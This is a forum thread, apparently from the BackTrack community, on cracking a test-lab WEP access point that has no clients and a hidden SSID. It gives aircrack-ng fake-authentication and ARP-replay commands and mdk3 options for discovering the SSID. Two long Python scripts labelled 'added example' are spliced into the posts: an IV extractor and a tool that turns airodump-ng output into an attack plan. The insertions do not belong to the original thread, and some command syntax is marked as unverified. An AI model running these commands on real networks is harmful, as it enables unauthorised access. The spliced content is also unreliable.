Remote Exploit Forums



Wireless: Specific topics related to the attack & defense of wireless systems

#1
10-08-2009, 11:25 AM
DamienThorn
Just burned his ISO
 
Join Date: Jan 2009
Posts: 3
Cracking WEP with no client

In my test lab I have an AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packets that I receive from the AP. I'll finally convert the broadcast packet so that the AP generates a new IV.

Before this attack works, I first need to perform a fake authentication. This succeeds when I know the ESSID.

So, the question is: how can I successfully authenticate without knowing the ESSID and with no wireless clients connected?

cheers
Damien
#2
10-08-2009, 12:57 PM
=TAPE=
Senior Member
 
Join Date: Aug 2008
Posts: 225

Check the latest video in the BT4 video section...
#3
10-08-2009, 02:53 PM
New Member
 
Join Date: Oct 2009
Posts: 1

Quote:
Originally Posted by DamienThorn
In my test lab I have an AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packets that I receive from the AP. I'll finally convert the broadcast packet so that the AP generates a new IV.

Before this attack works, I first need to perform a fake authentication. This succeeds when I know the ESSID.

So, the question is: how can I successfully authenticate without knowing the ESSID and with no wireless clients connected?

cheers
Damien
oh yes.. that's a really nice question..
hi everybody, my name is andre, I'm new to backtrack.

can anybody please help and tell me too, like Damien.


thanks.
Gbu.
#4
10-09-2009, 12:28 AM
htons139
Junior Member
 
Join Date: Sep 2008
Posts: 20

First, be sure to start airodump-ng, then run

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

Insert the AP MAC address, and your injection-enabled Ethernet card in place of mon0.

Then start aireplay in ARP replay mode and watch for magic!
__________________
In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
than man-made codes and corruptible devices, there is no such thing as a secret

Last edited by htons139; 10-09-2009 at 10:26 AM.
#5
10-09-2009, 10:01 AM
DamienThorn
Just burned his ISO
 
Join Date: Jan 2009
Posts: 3

I have no luck; when I launch the fake auth attack, I always get the message "Please specify an ESSID", even when I specify -h and the MAC of my machine. So association was not successful.

When I then launch aireplay-ng using ARP replay, I get disassociation messages.

Any suggestions?
#6
10-09-2009, 10:59 AM
htons139
Junior Member
 
Join Date: Sep 2008
Posts: 20

Quote:
Originally Posted by DamienThorn
I have no luck; when I launch the fake auth attack, I always get the message "Please specify an ESSID", even when I specify -h and the MAC of my machine. So association was not successful.

When I then launch aireplay-ng using ARP replay, I get disassociation messages.

Any suggestions?
Sorry for confusing you with my other post; you should use "-a" and not "-b" (this has been corrected in the older post). Try that and aireplay-ng should not ask for the ESSID.

Now for the long version of the reply
-------------------------------------------------
Your case

1- You have an AP that is broadcasting its BSSID
2- You have no MAC addresses of connected clients (not even from other, older sessions; they need not be connected at the moment of the attack)

The Attack:

A- Start collecting IVs

airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0

Make sure you insert the AP BSSID in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection-enabled NIC in place of mon0.

B- Run aireplay in fake auth mode

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

Insert the AP MAC address and the name of your NIC.

If the access point does not have MAC filtering, then you will be able to use the fake authentication attack without the -h argument; otherwise this attack will not work unless you use

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0

where yy:yy:yy:yy:yy:yy is the MAC address of an already connected client (NOT YOUR NIC MAC).

C- Finally, run aireplay in ARP replay mode

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0

Again, replace xx:xx:xx:xx:xx:xx with the AP MAC and mon0 with your NIC name.

Good luck

Last edited by htons139; 10-09-2009 at 11:03 AM.
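Added example, not part of htons139's post or of the aircrack-ng project: a small Python parser that does what step A (airodump-ng --ivs) does underneath, pulling the 24-bit WEP IV out of protected 802.11 data frames and counting distinct IVs per BSSID. The frames are constructed inline, and they also show why step C works: the frame we replay toward the AP carries the IV it was captured with and adds nothing new, while the AP's re-encrypted broadcast copy carries a fresh IV. Frame-control and address layout follow the 802.11 standard; the MAC addresses and payload bytes are made up.

```python
# Added example: extract WEP IVs from raw 802.11 data frames (what airodump-ng --ivs
# records) and count distinct IVs per BSSID. Frames below are constructed, not captured.
from collections import defaultdict

TYPE_DATA = 2            # frame-control type field value for data frames
FLAG_TODS = 0x01         # frame-control flags byte
FLAG_FROMDS = 0x02
FLAG_PROTECTED = 0x40    # "WEP"/protected-frame bit


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_wep_iv(frame):
    """Return (bssid, iv_hex, key_index) for a protected 802.11 data frame, else None."""
    if len(frame) < 28:
        return None
    fc0, fc1 = frame[0], frame[1]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    # management/control frames and null-function data subtypes carry no WEP body
    if ftype != TYPE_DATA or not (fc1 & FLAG_PROTECTED) or subtype & 0x4:
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    ds = fc1 & (FLAG_TODS | FLAG_FROMDS)
    if ds == 0:                  # ad-hoc: BSSID is addr3
        bssid = addr3
    elif ds == FLAG_FROMDS:      # AP -> station: BSSID is the transmitter, addr2
        bssid = addr2
    elif ds == FLAG_TODS:        # station -> AP: BSSID is the receiver, addr1
        bssid = addr1
    else:
        return None              # 4-address WDS frames: not handled here
    hdr_len = 26 if subtype & 0x8 else 24   # QoS data adds a 2-byte QoS control field
    body = frame[hdr_len:]
    if len(body) < 8:            # IV(3) + key-id byte(1) + at least the ICV(4)
        return None
    return mac_str(bssid), body[0:3].hex(), body[3] >> 6


def unique_ivs(frames):
    """Map BSSID -> number of distinct IVs seen; replays of the same ciphertext do not count."""
    seen = defaultdict(set)
    for f in frames:
        parsed = parse_wep_iv(f)
        if parsed:
            seen[parsed[0]].add(parsed[1])
    return {bssid: len(ivs) for bssid, ivs in seen.items()}


def make_data_frame(bssid, src, dst, iv, to_ds=False, from_ds=False, key_index=0):
    """Build a constructed WEP data frame; the ciphertext and ICV bytes are dummies."""
    fc1 = FLAG_PROTECTED | (FLAG_TODS if to_ds else 0) | (FLAG_FROMDS if from_ds else 0)
    if from_ds:
        a1, a2, a3 = dst, bssid, src
    elif to_ds:
        a1, a2, a3 = bssid, src, dst
    else:
        a1, a2, a3 = dst, src, bssid
    header = bytes([TYPE_DATA << 2, fc1]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00"
    wep_header = iv + bytes([key_index << 6])
    return header + wep_header + b"\x00" * 36 + b"\x00" * 4   # dummy ARP-sized body + ICV


# Constructed MACs for the demo
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("00aabbccddee")
BCAST = b"\xff" * 6

SAMPLE_FRAMES = [
    make_data_frame(AP, AP, BCAST, bytes.fromhex("0a0b0c"), from_ds=True),   # AP broadcast, IV #1
    make_data_frame(AP, STA, BCAST, bytes.fromhex("0a0b0c"), to_ds=True),    # our replay: same IV
    make_data_frame(AP, AP, BCAST, bytes.fromhex("0a0b0d"), from_ds=True),   # AP re-sends it: fresh IV
    make_data_frame(AP, AP, BCAST, bytes.fromhex("0a0b0e"), from_ds=True),   # and again
    bytes([0x80, 0x00]) + b"\x00" * 42,                                     # beacon: ignored
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(parse_wep_iv(f))
    print(unique_ivs(SAMPLE_FRAMES))   # {'00:11:22:33:44:55': 3}
```

Counting per BSSID and per distinct IV, rather than per frame, is the figure that matters: the replayed frame in the sample is the same ciphertext under the same IV and contributes nothing, only the AP's re-encryptions do.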
#7
10-09-2009, 01:10 PM
DamienThorn
Just burned his ISO
 
Join Date: Jan 2009
Posts: 3

Your situation works if the AP is broadcasting its ESSID, but the case is:

1) The AP does not broadcast its ESSID
2) There are no wireless clients connected to the AP

So, in your step B, I cannot use -h YY:YY, since there are no wireless clients.
#8
10-09-2009, 04:53 PM
htons139
Junior Member
 
Join Date: Sep 2008
Posts: 20

ESSID
The Extended Service Set ID (ESSID) is the name of the network you want to access. It is used to identify different wireless networks.

BSSID
The BSSID is a 48-bit identity used to identify a particular BSS (Basic Service Set) within an area.

It is clear you need to do some more reading... these are basics you should be informed about... do your homework and ask me no more questions before you do so.
#9
10-09-2009, 09:43 PM
=TAPE=
Senior Member
 
Join Date: Aug 2008
Posts: 225

^
Dude, you are misreading the OP's question completely..
reading abilities.. hmm..

He is talking about a network that is not broadcasting the ESSID..
So a hidden SSID..


There are a couple of options to try and find out what the ESSID is:

1. You do a dictionary attack on the network using mdk3.
2. You do a bruteforce attack on the network using mdk3
(not recommended for any SSID over 4 characters..)
3. You monitor the network and wait for someone to probe it / associate with it.



So, to Damien:

When you are running airodump and checking your network, is it showing a length-0 SSID, or length 5, or some other value?

If you can actually see how many characters it is, you can decide whether to use the bruteforce option. If it is length 0 then you will not know, so you would need to try the dictionary approach.

Again, I posted a vid on that specific situation:
MDK3 - Cracking hidden SSIDs in back|track 4

Check it out, and obviously, as you know the ESSID of your network, you can alter wordlists etc. to suit the best method of the above.
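Added example, not from =TAPE='s post and not from the aircrack-ng or mdk3 projects: a Python script that reads an airodump-ng CSV dump and applies the decision above for a hidden-SSID WEP AP, then emits the three aircrack-ng steps from post #6 (with -a for fake auth and -b for ARP replay). It goes a little beyond the post by ordering the options by cost: an associated client or a probed name of the right length is tried before any mdk3 run, brute force only for SSIDs of 4 characters or fewer, wordlist otherwise. The dump and all MAC addresses are constructed; the column layout (an "ID-length" column holding the SSID length from beacons, and a station table whose trailing "Probed ESSIDs" fields list what clients were looking for) is assumed to match airodump-ng 1.x. The mdk3 flag syntax (p -t <bssid> with -f <wordlist> or -b <charset>) is from memory and should be checked against mdk3's own help; wordlist.txt and mon0 are placeholders.

```python
# Added example: parse an airodump-ng CSV dump and pick a way past the fake-auth
# "Please specify an ESSID" problem for a hidden-SSID WEP AP. Column layout is assumed
# to match airodump-ng 1.x; the dump and the MAC addresses below are constructed.
import csv
import io

SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-10-09 10:00:01, 2009-10-09 10:05:32,  6,  54, WEP , WEP, OPN, -41, 311, 1204,   0.  0.  0.  0,   5, , 
00:11:22:33:44:66, 2009-10-09 10:00:02, 2009-10-09 10:05:30, 11,  54, WPA2, CCMP, PSK, -60, 290,    0,   0.  0.  0.  0,   7, guest01, 
00:11:22:33:44:77, 2009-10-09 10:00:05, 2009-10-09 10:05:29,  1,  11, WEP , WEP, OPN, -70, 100,   12,   0.  0.  0.  0,   3, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:aa:bb:cc:dd:ee, 2009-10-09 10:02:10, 2009-10-09 10:05:31, -52, 17, (not associated) , lab05
"""


def parse_airodump_csv(text):
    """Return (aps, stations); a blank line separates airodump-ng's two tables."""
    aps, stations = [], []
    for block in text.strip().split("\n\n"):
        rows = list(csv.reader(io.StringIO(block.strip()), skipinitialspace=True))
        header = [h.strip() for h in rows[0]]
        for row in rows[1:]:
            if not row or not row[0].strip():
                continue
            rec = {h: v.strip() for h, v in zip(header, row)}
            if header[0] == "BSSID":
                rec["ID-length"] = int(rec["ID-length"])   # SSID length from beacons, 0 = unknown
                rec["# IV"] = int(rec["# IV"])
                aps.append(rec)
            else:
                # a station that probed several names gets one extra field per name
                rec["Probed ESSIDs"] = [p.strip() for p in row[len(header) - 1:] if p.strip()]
                stations.append(rec)
    return aps, stations


def plan_attack(aps, stations, target, iface="mon0"):
    """Decide how to learn the ESSID, then emit the three aircrack-ng steps from the thread."""
    ap = next(a for a in aps if a["BSSID"].lower() == target.lower())
    clients = [s["Station MAC"] for s in stations if s["BSSID"].lower() == target.lower()]
    plan = {"bssid": ap["BSSID"], "channel": ap["channel"], "ivs": ap["# IV"],
            "essid_length": ap["ID-length"], "clients": clients,
            "candidates": [], "ssid_strategy": None, "commands": []}
    if ap["Privacy"] != "WEP":
        plan["ssid_strategy"] = "not WEP: IV collection / ARP replay does not apply"
        return plan
    length = ap["ID-length"]
    if ap["ESSID"]:
        plan["ssid_strategy"] = "ESSID is broadcast"
    elif clients:
        plan["ssid_strategy"] = "associated client present: wait for its probe/association, fake-auth with -h"
    else:
        # names any station probed for are candidates if the beacon's length field agrees
        probed = {p for s in stations for p in s["Probed ESSIDs"]}
        plan["candidates"] = sorted(p for p in probed if length in (0, len(p)))
        if plan["candidates"]:
            plan["ssid_strategy"] = "try probed ESSIDs of matching length"
        elif 1 <= length <= 4:
            plan["ssid_strategy"] = "mdk3 brute force (SSID of 4 chars or fewer)"
            plan["commands"].append(f"mdk3 {iface} p -t {ap['BSSID']} -b l")   # syntax from memory
        else:
            plan["ssid_strategy"] = "mdk3 wordlist (length unknown or too long to brute force)"
            plan["commands"].append(f"mdk3 {iface} p -t {ap['BSSID']} -f wordlist.txt")
    essid = ap["ESSID"] or (plan["candidates"][0] if plan["candidates"] else "<ESSID>")
    src = f" -h {clients[0]}" if clients else ""
    plan["commands"] += [
        f"airodump-ng --ivs -w wep -c {ap['channel']} --bssid {ap['BSSID']} {iface}",
        f"aireplay-ng -1 10 -e '{essid}'{src} -a {ap['BSSID']} {iface}",  # -a for fake auth
        f"aireplay-ng -3 -b {ap['BSSID']} {iface}",                       # -b for ARP replay
    ]
    return plan


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for bssid in ("00:11:22:33:44:55", "00:11:22:33:44:77", "00:11:22:33:44:66"):
        p = plan_attack(aps, stations, bssid)
        print(bssid, p["ssid_strategy"])
        for c in p["commands"]:
            print("   ", c)
```

In the constructed dump the first AP hides a 5-character SSID and a nearby, unassociated station has probed for "lab05", so that name is tried with -e before any mdk3 run; the third AP hides a 3-character SSID with no probes, so it gets the brute-force branch. Re-run the script against a fresh dump whenever airodump-ng picks up a new probe, since a single probe request from a client ends the guessing entirely.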
#10
10-21-2009, 07:38 AM
Reload
Just burned his ISO
 
Join Date: Jun 2009
Location: Texas (no, we don't all ride horses & yes we do have indoor plumbing)
Posts: 3
Error at 'replay-ng

Quote:
Originally Posted by htons139
[...]
A- Start collecting IVs

airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0

Make sure you insert the AP BSSID in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection-enabled NIC in place of mon0.
[...]
I've been attempting to do this very thing, yet when attempting this [code: airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0] I get "Invalid output format: IVs and PCAP format cannot be used together". What am I doing wrong? Thanks in advance for handing down the knowledge.

Last edited by Reload; 10-21-2009 at 07:58 AM. Reason: Figured out the answer. Don't mean to trouble yall needlessly.